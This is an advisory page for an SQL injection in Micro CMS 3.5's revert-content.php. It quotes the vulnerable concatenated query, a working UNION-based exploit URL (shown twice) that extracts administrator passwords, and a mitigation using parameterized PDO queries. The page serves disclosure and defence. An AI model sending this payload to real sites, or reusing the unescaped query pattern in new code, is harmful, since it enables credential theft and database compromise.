Vendor: Micro CMS
By: notsec.com
CVSS: 7.5 (HIGH)
SQL Injection
CWE: 89
Product Name: Micro CMS
Affected Version From: Micro CMS 3.5
Affected Version To: Micro CMS 3.5
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Micro CMS 3.5 SQL Injection

Micro CMS 3.5 is vulnerable to SQL injection in 'cms/revert-content.php'. The 'id' request parameter is concatenated, unescaped, into a double-quoted string literal in a SELECT against microcms_content_blurb_history, so a value containing a double quote closes the literal and the rest of the value is parsed as SQL. This allows the attacker to bypass authentication and retrieve sensitive information from the database. The published exploit appends a UNION ALL SELECT that reads administrators_pass from microcms_administrators: 'http://site.com/[micro_cms]/cms/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SELECT%20null,null,SUBSTRING(administrators_pass,1,16),null,null%20FROM%20microcms_administrators/*'.

Mitigation:

To mitigate this vulnerability, sanitize user input and build the query with prepared statements (parameterized queries) instead of concatenating the 'id' value into the SQL string.
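One way to apply this mitigation to the lookup in cms/revert-content.php, as an added example that is not code from Micro CMS or the advisory. It uses PDO with an in-memory SQLite table constructed for the demo; the `body` column, the function names and the identifier pattern are assumptions.

```php
<?php
declare(strict_types=1);

// Constructed in-memory stand-in for the table queried by cms/revert-content.php.
// Table and first two column names are from the advisory; "body" is hypothetical.
function demo_db(): PDO
{
    $pdo = new PDO('sqlite::memory:');
    $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    $pdo->exec('CREATE TABLE microcms_content_blurb_history (
        content_blurbs_variable TEXT,
        content_blurb_history_version_num INTEGER,
        body TEXT)');
    $ins = $pdo->prepare('INSERT INTO microcms_content_blurb_history VALUES (?, ?, ?)');
    $ins->execute(['intro', 1, 'first draft']);
    $ins->execute(['intro', 2, 'second draft']);
    return $pdo;
}

// Parameterized form of the vulnerable query: the id travels as a bound value,
// so a double quote in it cannot terminate a string literal in the SQL text.
function newest_revision(PDO $pdo, string $id): ?array
{
    $stmt = $pdo->prepare(
        'SELECT *
           FROM microcms_content_blurb_history
          WHERE content_blurbs_variable = :id
          ORDER BY content_blurb_history_version_num DESC
          LIMIT 1'
    );
    $stmt->execute([':id' => $id]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Extra input check. Assumption: blurb variable names are short identifiers.
function is_valid_blurb_id(string $id): bool
{
    return preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $id) === 1;
}

$pdo = demo_db();
foreach (['intro', 'intro" --'] as $id) {   // second value: constructed malformed id
    printf("%-10s valid=%s row=%s\n", $id,
        var_export(is_valid_blurb_id($id), true),
        json_encode(newest_revision($pdo, $id)));
}
```

The same prepare/execute calls work unchanged with a `mysql:` DSN; the `mysql_query()` function used by the vulnerable code has no parameter binding and was removed in PHP 7.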
Source

Exploit-DB raw data:

#########################################################################################
#
#                        not sec group
#        http://www.notsec.com     info@notsec.com
#
# [Micro CMS 3.5]
#
# Class:     SQL Injection
# Found:     28/08/2007
# Remote:    Yes
# Site:      http://www.impliedbydesign.com/ibd-micro-cms-static-content-manager.html
# Download:  http://www.impliedbydesign.com/apps/microcms/microcms.zip
# Demo site: http://www.impliedbydesign.com/micro-cms-content-management-demo.php
#
#########################################################################################


       Vulnerable code:
       cms/revert-content.php
============================================================================================================
$sql = '        SELECT *
           FROM microcms_content_blurb_history
           WHERE content_blurbs_variable = "' . $_GET['id'] . '"
           ORDER BY content_blurb_history_version_num DESC
           LIMIT 1';
$result = mysql_query($sql);
============================================================================================================


       Exploit :
============================================================================================================================================================================================
http://site.com/[micro_cms]/cms/revert-content.php?type=newest&id=1%22%20UNION%20ALL%20SELECT%20null,null,SUBSTRING(administrators_pass,1,16),null,null%20FROM%20microcms_administrators/*
============================================================================================================================================================================================


       Thanks To:
=========================
All notsec.com members;
White_Sheep for Bugs Hunter;
=========================
# notsec.com

# milw0rm.com [2007-08-28]